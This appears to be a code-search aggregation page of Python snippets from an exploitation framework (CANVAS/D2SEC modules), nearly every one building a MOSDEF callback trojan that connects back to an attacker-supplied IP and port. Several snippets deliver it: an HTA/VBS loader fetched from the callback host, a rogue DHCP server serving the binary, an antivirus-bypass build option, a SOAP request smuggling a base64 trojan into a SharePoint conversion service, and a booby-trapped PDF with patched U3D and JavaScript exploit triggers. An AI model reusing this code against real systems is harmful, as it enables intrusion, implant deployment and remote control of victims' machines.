def maketrojan(self):
        t_os = canvasos("Windows")
        t_os.arch = "X86"
    
        self.buildmosdeftrojan(self.callback.ip, self.callback.port, target_os = t_os, http=True, ssl=self.useSSL)        
        self.log("Writing out %d bytes to %s"%(len(self.mosdeftrojan), self.trojannamew))          		
        self.setInfo("%s - done"%(NAME))
        ret = len(self.mosdeftrojan) != 0	
		
        return ret
Example #2
0
 def maketrojan(self):
   from libs.canvasos import canvasos
   my_os = canvasos('Linux')
   my_os.arch = 'X86'
   self.log("[D2] Creating a callback to %s:%s"%(self.callback.ip, self.callback.port))
   if not self.buildmosdeftrojan(self.callback.ip, self.callback.port, target_os=my_os, universal=True):
     return 0 
   file(self.trojanname, "wb").write(self.mosdeftrojan)
   ret = len(self.mosdeftrojan) != 0
   return ret
Example #3
0
    def maketrojan(self):   
    	t_os = canvasos("Windows")
    	t_os.arch = "X64"        

    	self.buildmosdeftrojan(self.callback.ip, self.callback.port, target_os = t_os)        
    	self.log("Writing out %d bytes to %s"%(len(self.mosdeftrojan), self.trojanname))        
    	self.htafile = self.file4hta(self.mosdeftrojan)
    	file(self.trojanname, "wb").write(self.htafile)
    	self.setInfo("%s - done"%(NAME))
    	ret = len(self.mosdeftrojan) != 0
Example #4
0
    def maketrojan(self):    	
    	t_os = canvasos("Linux")
    	t_os.arch = "X86"
	    
    	self.buildmosdeftrojan(self.callback.ip, self.callback.port, target_os = t_os)        
    	self.log("Writing out %d bytes to %s"%(len(self.mosdeftrojan), self.trojanname))        		
    	file(self.trojanname, "wb").write(self.mosdeftrojan)
    	self.setInfo("%s - done"%(NAME))
    	ret = len(self.mosdeftrojan) != 0	

    	return ret	
Example #5
0
 def gen_trojan(self):
   self.log("[D2] Building MOSDEF Trojan")
   t_os = canvasos('WINDOWS')
   t_os.arch = 'X86'
   mosdef = os.path.join(self.respath, self.mosdef.split('\\')[-1:][0])
   try:
     self.buildmosdeftrojan(self.callback_host, self.callback_port, t_os, universal=True)
     self.log("Writing out %d bytes to %s"%(len(self.mosdeftrojan),mosdef))
     file(mosdef,"wb").write(self.mosdeftrojan)
   except Exception, e:
     self.log(e)
     return 0
Example #6
0
 def build_mosdef_callback(self):
     t_os = canvasos("Linux")
     t_os.arch = self._arch
     try:
         ret = self.buildmosdeftrojan(self.callback.ip,
                                      self.callback.port,
                                      target_os=t_os,
                                      universal=True)
         if ret:
             return self.mosdeftrojan
     except Exception, err:
         logging.error("Error while building MOSDEF callback: %s" %
                       str(err))
Example #7
0
 def maketrojan(self):
     from libs.canvasos import canvasos
     my_os = canvasos(self.platform)
     my_os.arch = self.arch
     self.log("Creating a callback to %s:%s" %
              (self.callback.ip, self.callback.port))
     if not self.buildmosdeftrojan(self.callback.ip,
                                   self.callback.port,
                                   target_os=my_os,
                                   universal=True):
         return ''
     base64data = base64.encodestring(self.mosdeftrojan)
     return base64data
Example #8
0
    def maketrojan(self):
        t_os = canvasos("Windows")
        t_os.arch = "X86"

        self.buildmosdeftrojan(self.callback.ip,
                               self.callback.port,
                               http=True,
                               target_os=t_os)
        self.log("Writing out %d bytes to %s" %
                 (len(self.mosdeftrojan), self.binname))

        ret = len(self.mosdeftrojan) != 0

        return ret
Example #9
0
    def maketrojan(self):
        t_os = canvasos(targets[self.version])
        t_os.arch = "X86"

        if self.version == 0:
            self.buildmosdeftrojan(self.callback.ip,
                                   self.callback.port,
                                   target_os=t_os)
            self.log("Writing out %d bytes to %s" %
                     (len(self.mosdeftrojan), self.trojanname))
            self.htafile = self.file4hta(self.mosdeftrojan)
            file(self.trojanname, "wb").write(self.htafile)
            self.setInfo("%s - done" % (NAME))
            ret = len(self.mosdeftrojan) != 0

        else:
            from MOSDEF import makeexe
            from MOSDEF.cc import threadsafe_cc_main

            self.log("[!] Compiling Unix trojan")
            infilename = "backdoors/cback_mmap_rwx.c"
            vars = {}
            vars['CBACK_PORT'] = self.callback.port
            vars['CBACK_ADDR'] = str2int32(socket.inet_aton(self.callback.ip))
            self.log("[!] Callback address is %s" % vars['CBACK_ADDR'])
            cc_command = []

            for var in vars:
                cc_command += ["-D", "%s=%s" % (var, vars[var])]

            cc_command += [
                "-d", "-v", "-m", "Linux", "-p", "i386", "-k", "None",
                infilename
            ]
            self.log("[!] CC command: %s" % cc_command)
            mosdeftrojan = threadsafe_cc_main(cc_command)

            if not mosdeftrojan:
                self.log("[X] Was unable to create trojan!")
                return ""

            self.log("[!] Length of CC compiled trojan: %s" %
                     len(mosdeftrojan))
            self.log("[!] Writing out %d bytes to %s" %
                     (len(mosdeftrojan), self.trojanname))
            file(self.trojanname, "wb").write(mosdeftrojan)
            ret = len(mosdeftrojan) != 0

        return ret
Example #10
0
    def set_up_tftp_server(self):


        self.log("building the MOSDEF trojan")

        t_os        = canvasos("Windows")
        t_os.arch   = "X86"
        t_os.version   = "XP"

        try:
            self.log("HTTP: %d, SSL: %d" % (self.HTTP,self.SSL))
            mosdeftrojan = self.buildmosdeftrojan(self.callback.ip, self.callback.port, target_os=t_os, http=self.HTTP, ssl=self.SSL)
        except Exception, err:
            self.log("Problem building the MOSDEF trojan: %s"%(err))
            self.setInfo("%s - failed" % (NAME))
            return 0
Example #11
0
 def run(self):
     self.getargs()
     self.setInfo("%s (in progress)" % (NAME))
     
     t_os = canvasos(self.OS)
     t_os.arch = self.ARCH
     self.log("Building MOSDEF trojan for: %s %s" % (t_os, t_os.arch))
     self.log('Universal: %s' % self.Universal)
     self.log('Encrypted: %s' % self.encrypted)
     
     try:
         ret = self.buildmosdeftrojan(self.callback_host, self.callback_port, target_os=t_os, http=self.HTTP, ssl=self.SSL, universal=self.Universal, encrypted=self.encrypted)
     except Exception, err:
         self.log("Problem building the MOSDEF trojan: %s"%(err))
         self.setInfo("%s - failed" % (NAME))
         return 0
Example #12
0
 def __build_universal_trojan(self):
     res = True
     logging.info("Creating MOSDEF Trojans for ip: %s and port: %s" %
                  (str(self.callback.ip), str(self.callback.port)))
     t_os = canvasos("WINDOWS")
     t_os.arch = "X86"
     try:
         ret = self.buildmosdeftrojan(self.callback.ip,
                                      self.callback.port,
                                      target_os=t_os,
                                      universal=True)
         if ret:
             filename = os.path.join(self.tmppath, "callback_windows.exe")
             with open(filename, "wb") as f:
                 f.write(self.mosdeftrojan)
     except Exception, err:
         logging.error("Problem building MOSDEF trojan: %s" % str(err))
         res = False
Example #13
0
 def maketrojan(self):
     from libs.canvasos import canvasos
     my_os = canvasos(self.os)
     my_os.arch = 'X86'
     self.log("Creating a callback to %s:%s" %
              (self.callback.ip, self.callback.port))
     if not self.buildmosdeftrojan(self.callback.ip,
                                   self.callback.port,
                                   target_os=my_os,
                                   universal=True):
         return 0
     if self.os == "Windows":
         self.htafile = self.file4hta(self.mosdeftrojan)
         file(self.trojanname, "wb").write(self.htafile)
         self.setInfo("%s - done" % (NAME))
     else:
         file(self.trojanname, "wb").write(self.mosdeftrojan)
     ret = len(self.mosdeftrojan) != 0
     return ret
Example #14
0
    def gen_trojan(self):

        self.log("[D2 LOG] Building MOSDEF Trojan")
        t_os = canvasos(self.OS)
        t_os.arch = self.ARCH

        mosdef = os.getcwd(
        ) + "/3rdparty/D2SEC/exploits/d2sec_svcwrapper/" + self.mosdef.split(
            '\\')[-1:][0]

        self.buildmosdeftrojan(self.callback_host,
                               self.callback_port,
                               target_os=t_os)
        self.log("Writing out %d bytes to %s" %
                 (len(self.mosdeftrojan), mosdef))
        file(mosdef, "wb").write(self.mosdeftrojan)

        self.log("\n")

        return len(self.mosdeftrojan)
Example #15
0
 def build_universal_trojans(self, http=False, ssl=False):
     res = True
     t_os = canvasos("WINDOWS")
     for arch in ("X86", "X64"):
         t_os.arch = arch
         try:
             ret = self.buildmosdeftrojan(self.callback.ip,
                                          self.callback.port,
                                          target_os=t_os,
                                          universal=True,
                                          http=http,
                                          ssl=ssl)
             if ret:
                 filename = os.path.join(self.respath,
                                         "callback_%s.exe" % arch)
                 with open(filename, "wb") as f:
                     f.write(self.mosdeftrojan)
         except Exception, err:
             self.log("Problem building MOSDEF trojan: %s" % str(err))
             res = False
Example #16
0
    def run(self):
        self.getargs()
        self.setInfo("%s (in progress)" % NAME)

        if not self.host:
            self.log(
                'Error: MOSDEF DLL needs a listener ip to connect back to.')
            return 0

        if not self.port:
            self.log(
                'Error: MOSDEF DLL needs a listener port to connect back to.')
            return 0

        self.log('Using listener ip: %s and port: %d' % (self.host, self.port))

        if not self.http: self.log('Universal: %s' % self.universal)
        self.log('64 bits: %s' % self.bits64)

        if self.http:
            self.log('HTTP: True')
            self.log('SSL: %s' % self.http_ssl)

        tos = canvasos('Windows')
        if self.bits64: tos.arch = 'x64'

        self.buildmosdeftrojan(self.host,
                               self.port,
                               target_os=tos,
                               universal=self.universal,
                               encrypted=False,
                               dll=True,
                               http=self.http,
                               ssl=self.http_ssl,
                               win8_compatible=True)
        try:
            with open(self.filename, 'wb') as f:
                f.write(self.mosdeftrojan)
        except Exception, ex:
            self.log(traceback.format_exc(5))
            return 0
Example #17
0
    def create_dll_file(self, win64=0):
        pelib = PElib(win64=win64)

        # Create the dll in memory
        shellcode = None
        buffer = None
        if not win64:
            shellcode = self.createShellcode()
            buffer = pelib.createPEFileBuf({"DllMain": shellcode}, gui=False)
            return buffer
        else:
            tos = canvasos("Windows")
            tos.arch = 'x64'
            text = self.buildmosdeftrojan(self.callback.ip,
                                          self.callback.port,
                                          target_os=tos,
                                          universal=True,
                                          encrypted=False,
                                          dll=True,
                                          win8_compatible=True)
            return self.mosdeftrojan
Example #18
0
    def build_universal_trojans(self, http=False, ssl=False):
        res = True
        self.log("Creating MOSDEF Trojans for ip: %s and port: %s" % (str(self.callback.ip), str(self.callback.port)))
        for platform in ("Windows", "Linux"):
            t_os = canvasos(platform)

            for arch in ("X86", "X64"):
                t_os.arch = arch
                # nasty way of creating an x64 binary for linux... x64 is still not supported
                if platform == "Linux" and arch == "X64":
                    t_os.arch = "X86"
                try:
                    ret = self.buildmosdeftrojan(self.callback.ip, self.callback.port,
                        target_os=t_os, universal=True,
                        http=http, ssl=ssl)
                    if ret:
                        filename = os.path.join(self.tmppath, "callback_%s_%s.exe" % (platform.lower(), arch))
                        with open(filename,"wb") as f:
                            f.write(self.mosdeftrojan)
                except Exception, err:
                    self.log("Problem building MOSDEF trojan: %s" % str(err))
                    res = False
Example #19
0
    def run(self):
        self.getargs()
        self.setInfo("%s (in progress)" % (NAME))

        node = self.argsDict["passednodes"][0]
        t_os = canvasos(self.OS)
        t_os.arch = self.ARCH

        # these set self.mosdeftrojan with the binary data ..
        self.buildmosdeftrojan(self.callback_host,
                               self.callback_port,
                               target_os=t_os,
                               http=self.HTTP,
                               ssl=self.SSL)

        self.log("Writing out %d bytes to %s" %
                 (len(self.mosdeftrojan), self.filename))

        file(self.filename, "wb").write(self.mosdeftrojan)

        self.setInfo("%s - done" % (NAME))
        return len(self.mosdeftrojan) != 0
Example #20
0
    def run(self):
        self.node = self.argsDict['passednodes'][0]

        if 'linux' not in self.node.capabilities:
            self.log('[!] Not a linux node ...')
            return 0

        #self.log('[+] Randomizing remote paths..')
        #self.remote_exploit = self.remote_exploit + self.random_str(5)
        #self.remote_cback   = self.remote_cback + self.random_str(5)

        self.log('[+] Remote path to exploit: %s' % self.remote_exploit)
        self.log('[+] Remote path to callback: %s' % self.remote_cback)

        self.log("Creating MOSDEF callback for ip: %s and port: %s" %
                 (self.callback.ip, self.callback.port))

        platform = "Linux"
        t_os = canvasos(platform)
        t_os.arch = "X86"

        try:
            ret = self.buildmosdeftrojan(self.callback.ip,
                                         self.callback.port,
                                         target_os=t_os,
                                         universal=True)
            if ret:
                self.local_cback = os.path.join(
                    self.tmppath,
                    "callback_%s_%s" % (platform.lower(), t_os.arch))
                with open(self.local_cback, "wb") as f:
                    f.write(self.mosdeftrojan)
                self.log("[+] Done creating callback")
            else:
                raise Exception('buildmosdeftrojan returned False')
        except Exception, err:
            self.log("[!] Error building MOSDEF callback: %s" % err)
            return 0
Example #21
0
    def create_native_callback(self):
        """
        Build a MOSDEF callback binary
        """
        if not self.callback:
            logging.error('No callback set')
            return False

        try:
            t_os = canvasos('Windows')
            t_os.arch = self.arch.upper()

            try:
                # Now that we have av_bypass encrypted is not needed
                ret = self.buildmosdeftrojan(
                    self.callback.ip,
                    self.callback.port,
                    target_os=t_os,
                    universal=True,
                    #encrypted=True,
                    av_bypass=True)
            except Exception as e:
                logging.error("Error while building MOSDEF callback: %s" %
                              (str(e)))
                return False

            # write out the binary
            logging.info('Writing callback trojan to %s' % self.local_callback)
            fd = open(self.local_callback, 'wb')
            fd.write(self.mosdeftrojan)
            fd.close()
        except Exception as e:
            logging.error(
                "An error occurred while generating mosdef callback (%s)" %
                str(e))
            return False

        return True
Example #22
0
    def maketrojan(self):
        t_os = canvasos("Windows")
        t_os.arch = "X86"
        self.buildmosdeftrojan(self.callback.ip,
                               self.callback.port,
                               target_os=t_os,
                               http=True,
                               ssl=self.useSSL)
        self.log("Writing out %d bytes to %s" %
                 (len(self.mosdeftrojan), self.trojanname))

        self.htafile = self.file4hta(self.mosdeftrojan)
        file(self.exploitpath + self.vbsfile, "wb").write(self.htafile)

        tmp = file(self.exploitpath + self.filecwxtmp, "rb").read()
        vbs = "<SCRIPT language=vbs src=\\\\" + self.callback.ip + "\\d\\" + self.vbsfile + "></SCRIPT>"
        file(self.exploitpath + self.filecwx,
             "wb").write(tmp[:-(len(vbs))] + vbs)

        self.setInfo("%s - done" % (NAME))
        ret = len(self.mosdeftrojan) != 0

        return ret
Example #23
0
    def run(self):
        self.getargs()
        self.setInfo("%s (in progress)" % (NAME))

        t_os = canvasos(self.OS)
        # Create the object mosdef_powershell
        ps_mosdef = mosdef_powershell()
        logging.info("Building Powershell MOSDEF Callback Script")

        try:
            ps_mosdef.setup(self.callback_host,
                            self.callback_port,
                            mosdef_type=23,
                            mosdef_id=self.engine.getNewMosdefID(self))
            self.psmosdefcallback = ps_mosdef.createMosdefCallback()

        except Exception, err:
            import traceback
            traceback.print_exc()
            logging.error("Error while building PowerShell callback (%s)" %
                          (err))
            self.setInfo("%s - failed" % (NAME))
            return 0
Example #24
0
    def create_callback(self, arch):
        """
        Build the MOSDEF callback trojan. On x64 capabable
        systems we use the x64 callback.
        """
        if not self.callback:
            logging.error('No callback set')
            return False
        try:
            t_os = canvasos('Windows')
            t_os.arch = arch
            try:
                ret = self.buildmosdeftrojan(self.callback.ip,
                                             self.callback.port,
                                             target_os=t_os,
                                             universal=True,
                                             encrypted=True)
            except Exception as e:
                logging.error("Error while building MOSDEF callback: %s" %
                              (str(e)))
                logging.info("%s - failed" % (NAME))
                return False

            # write out the binary
            src = self.local_callback
            logging.info('Writing callback trojan in %s' % src)
            fd = open(src, 'wb')
            fd.write(self.mosdeftrojan)
            fd.close()
        except Exception as e:
            if self.debug_errors:
                logging.debug('create_callback() failed: %s' % str(e))
            logging.error("An errorr occurred while creating mosdef callback")
            return False

        return True
Example #25
0
    def maketrojan(self):		
		t_os = canvasos("Windows")
		t_os.arch = "X86"    
		self.buildmosdeftrojan(self.callback.ip, self.callback.port, http=True, target_os = t_os)                
		self.htafile = self.file4hta(self.mosdeftrojan)
Example #26
0
 def create_shellcode(self):
     t_os = canvasos("Linux")
     t_os.arch = "X86"
     ret = self.buildmosdeftrojan(self.callback.ip, self.callback.port, target_os=t_os, universal=True)
     return self.mosdeftrojan
Example #27
0
    def run(self):
        # get callback
        self.iface = self.callback.parent.interface
        #print "callback ip: ", self.callback.ip, " ,port: ", self.callback.port, " ,iface: ",self.iface

        # filename
        import string, random
        self.filename = "".join(
            [random.choice(string.uppercase) for x in range(4)])

        # create DGRAM socket to send dhcp answers
        self.dhcpd = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.dhcpd.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
        self.dhcpd.bind(('', 67))
        # Testing broadcast:
        #self.dhcpd.sendto("AAAAAAAA",("<broadcast>", 68))

        # build new mosdef trojan
        t_os = canvasos("Linux")
        t_os.arch = "X86"
        t_os.version = "2.6"
        ret = self.buildmosdeftrojan(self.callback.ip,
                                     self.callback.port,
                                     target_os=t_os,
                                     http=False,
                                     ssl=False,
                                     universal=True)

        if not ret: print '[+] Error building mosdef trojan'
        # upload_server:
        from ExploitTypes.CommandLineExecuter import tcp_upload_listener
        tul = tcp_upload_listener()
        tul.data = self.mosdeftrojan
        # for gettcplistener from canvasexploit
        tul.getsock = self

        # listen
        self.fileport = 0
        while not self.fileport:
            self.fileport = random.randint(1, 65535)
            try:
                tul.listen(self.fileport)
                #print "tul success with port: ", self.fileport
            except:
                #print "tul didnt success with port: ", self.fileport
                self.fileport = 0

        self.log("Serving file at port: %d" % self.fileport)

        # init sniffer ... XXX: iface setting ???
        if hasattr(self, 'engine') and \
                hasattr(self.engine, 'localsniffer') and \
                hasattr(self.engine.localsniffer, 'running') and \
                self.engine.localsniffer.running():
            sniff = self.engine.localsniffer
        else:
            sniff = localsniffer.localsniffer()
            sniff.start()
        self.log("Sniffer started")

        # register callback
        sniff.registercallback(self.dhcp_callback, 'layer(ethernet)')
        self.log("Callback registered")

        # ...
        while self.interrupt == False:
            # handle connections to serve file
            tul.accept()
            if tul.send_file():
                # make netcat close on the other side
                tul.fd.close()
                tul.fd = None
                # and return, we succeed
                break
            # interrupt on success (or whatever)
            time.sleep(0.5)

        # close listener
        tul.close()

        # shutdown sniffer
        sniff.unregistercallback(self.dhcp_callback)
        sniff.shutdown()

        return None
Example #28
0
    def run(self):
        """
        Actually exploit the target.
        """
        self.getargs()

        content = """<SOAP-ENV:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:clr="http://schemas.microsoft.com/soap/encoding/clr/1.0" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Header>
<h4:__CallContext href="#ref-3" xmlns:h4="http://schemas.microsoft.com/clr/soap/messageProperties" SOAP-ENC:root="1"/>
<a1:LogicalCallContext id="ref-3" xmlns:a1="http://schemas.microsoft.com/clr/ns/System.Runtime.Remoting.Messaging">
<E2ETrace.ActivityID xsi:type="a2:Guid" xmlns:a2="http://schemas.microsoft.com/clr/ns/System">
<_a>0</_a>
<_b>0</_b>
<_c>0</_c>
<_d>27</_d>
<_e>3</_e>
<_f>0</_f>
<_g>128</_g>
<_h>0</_h>
<_i>0</_i>
<_j>0</_j>
<_k>238</_k>
</E2ETrace.ActivityID>
</a1:LogicalCallContext>
</SOAP-ENV:Header>
<SOAP-ENV:Body>
<i5:ConvertFile id="ref-1" xmlns:i5="http://schemas.microsoft.com/clr/nsassem/Microsoft.HtmlTrans.IDocumentConversionsLauncher/Microsoft.HtmlTrans.Interface">
<launcherUri id="ref-6">http://HOST:PORT/HtmlTrLauncher</launcherUri>
<appExe id="ref-7">PdfPageConverter.exe</appExe>
<convertFrom id="ref-8">..\\..\\..\\..\\TransformApps\\PdfPageConverter.exe</convertFrom>
<convertTo id="ref-9">html</convertTo>
<fileBits href="#ref-10"/>
<taskName id="ref-11">empty.docxdoctrans</taskName>
<configInfo id="ref-12">&#60;RcaTransformation&#62;&#60;ConverterSettings SourceDocLibUrl=&#34;/Docs/Documents&#34;&#62;&#60;/ConverterSettings&#62;&#60;TransformationContext&#62;&#60;TransformationStateStore xmlns:xsi=&#34;http://www.w3.org/2001/XMLSchema-instance&#34; xmlns:xsd=&#34;http://www.w3.org/2001/XMLSchema&#34;&#62;&#60;IsUpdate&#62;false&#60;/IsUpdate&#62;&#60;LayoutBodyFieldId&#62;f55c4d88-1f2e-4ad9-aaa8-819af4ee7ee8&#60;/LayoutBodyFieldId&#62;&#60;LayoutStylesFieldId&#62;a932ec3f-94c1-48b1-b6dc-41aaa6eb7e54&#60;/LayoutStylesFieldId&#62;&#60;PageSiteId&#62;58bae916-c04a-4855-b737-5399c3d8eca4&#60;/PageSiteId&#62;&#60;PageWebId&#62;7477f6ab-0b45-48c4-9a07-115f70a5689c&#60;/PageWebId&#62;&#60;PageUrl&#62;Pages/empty.aspx&#60;/PageUrl&#62;&#60;/TransformationStateStore&#62;&#60;/TransformationContext&#62;&#60;/RcaTransformation&#62;</configInfo>
<timeout>300</timeout>
<fReturnFileBits>true</fReturnFileBits>
</i5:ConvertFile>
<SOAP-ENC:Array id="ref-10" xsi:type="SOAP-ENC:base64">SHELLCODE</SOAP-ENC:Array>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
"""
        t_os = canvasos('Windows')
        t_os.arch = self.arch
        self.buildmosdeftrojan(self.callback.ip,
                               self.callback.port,
                               target_os=t_os,
                               http=False,
                               ssl=False,
                               universal=True,
                               encrypted=False)

        trojan = base64.b64encode(self.mosdeftrojan)
        content = content.replace('PORT', str(self.port))
        hostname = socket.gethostbyaddr(self.host)[0]
        content = content.replace('HOST', hostname)
        content = content.replace('SHELLCODE', trojan)

        addr = self.host + ':' + str(self.port)
        conn = httplib.HTTP(addr)
        conn.putrequest("POST", "/HtmlTrLauncher")
        conn.putheader("Content-type", 'text/xml; charset="utf-8"')
        conn.putheader(
            "User-Agent",
            "Mozilla/4.0+(compatible; MSIE 6.0; Windows 6.1.7601.65536; MS .NET Remoting; MS .NET CLR 2.0.50727.5420 )"
        )
        conn.putheader(
            "SOAPAction",
            "http://schemas.microsoft.com/clr/nsassem/Microsoft.HtmlTrans.IDocumentConversionsLauncher/Microsoft.HtmlTrans.Interface#ConvertFile"
        )
        conn.putheader("Host", addr)
        conn.putheader("Content-length", "%d" % len(content))
        conn.endheaders()
        conn.send(content)
Example #29
0
    def makePDF(self):
        #Open the sample PDF
        reader = PdfFileReader(file(self.sample_pdf, 'rb'))

        #Add our executable
        from libs.canvasos import *
        t_os = canvasos('WINDOWS')
        t_os.arch = 'X86'
        trojan = self.buildmosdeftrojan(self.callback.ip,
                                        self.callback.port,
                                        t_os,
                                        universal=True)
        exe = self.mosdeftrojan
        exe_len = len(exe)
        total_len = PDF_OVERHEAD + exe_len
        payload_exe = 'M'
        for i in range(1, exe_len):
            payload_exe += chr(ord(exe[i]) ^ 0x12)
        exeobj = StreamObject()
        exeobj._data = payload_exe

        #Extract and modify the U3D data (exploit trigger)
        u3dobj = IndirectObject(10, 0, reader).getObject()
        u3ddata = decodeStreamData(u3dobj)
        #u3ddata = string.replace(u3ddata, "RRR", "\x0c\x0c\x0c")
        #u3ddata = string.replace(u3ddata, "RR", "\x0c\x0c")
        u3ddata = string.replace(u3ddata, "RRRR", "\x0c\x0c\x0c\x1c")
        u3dobj._data = u3ddata
        u3dobj[NameObject('/Filter')] = NullObject()

        #Extract and modify the Javascript
        jsobj = reader.trailer['/Root']['/OpenAction']['/JS'].getObject()
        jsdata = FlateDecode.decode(jsobj._data, None)
        jsdata = string.replace(jsdata, '\x00', '>')
        jsdata = ASCIIHexDecode.decode(jsdata, None)
        jsdata = string.replace(jsdata, "9b97MM9b9b", "xxSSxx")
        jsdata = string.replace(jsdata, "9b9bMM9b9b", "9b9bMM8b9b")
        jsdata = string.replace(jsdata, "xxSSxx", "9b97MM9b9b")
        jsdata = string.replace(jsdata, "0c0cMM0c0c", "0c0cMM1c0c")
        jsdata = string.replace(jsdata, '"M" + "M" + "0" + "c" + "0" + "c"',
                                '"MM"+"0c"+"0c"+"MM" + "1c" + "0c"')
        #jsdata = string.replace(jsdata, "9090", "90cc") #Set an int 3
        jsdata = string.replace(
            jsdata, "ad2fMM9796",
            self.jsEncodeDword(total_len))  #set the file length
        jsdata = string.replace(
            jsdata, "9ffe", "a234"
        )  #set the offset to the file data XXX: may change if any of the above code changes
        jsdata = string.replace(
            jsdata, "0b97MM9797",
            self.jsEncodeDword(exe_len))  #set the length to write
        #jump to the TerminateProcess code (skip dropping and opening a real PDF)
        jsdata = string.replace(jsdata, "c21cMMc52bMMc268", "977eMM9795MMc297")
        jsobj._data = jsdata
        jsobj[NameObject('/Filter')] = NullObject()

        #Close everything and write out the PDF
        output = PdfFileWriter()
        for num in range(0, reader.getNumPages()):
            output.addPage(reader.getPage(num))
        root = output._root.getObject()
        root.update({NameObject('/OpenAction'):reader.trailer['/Root']['/OpenAction'],\
                     NameObject('/AcroForm'):reader.trailer['/Root']['/AcroForm'],\
                     NameObject('/PreviewImg'):exeobj})

        outbuf = StringIO()
        output.write(outbuf)
        pdfdata = outbuf.getvalue()
        f = open('new.pdf', 'wb')
        f.write(pdfdata)
        f.close()
        self.log('Wrote pdf to new.pdf')
        return pdfdata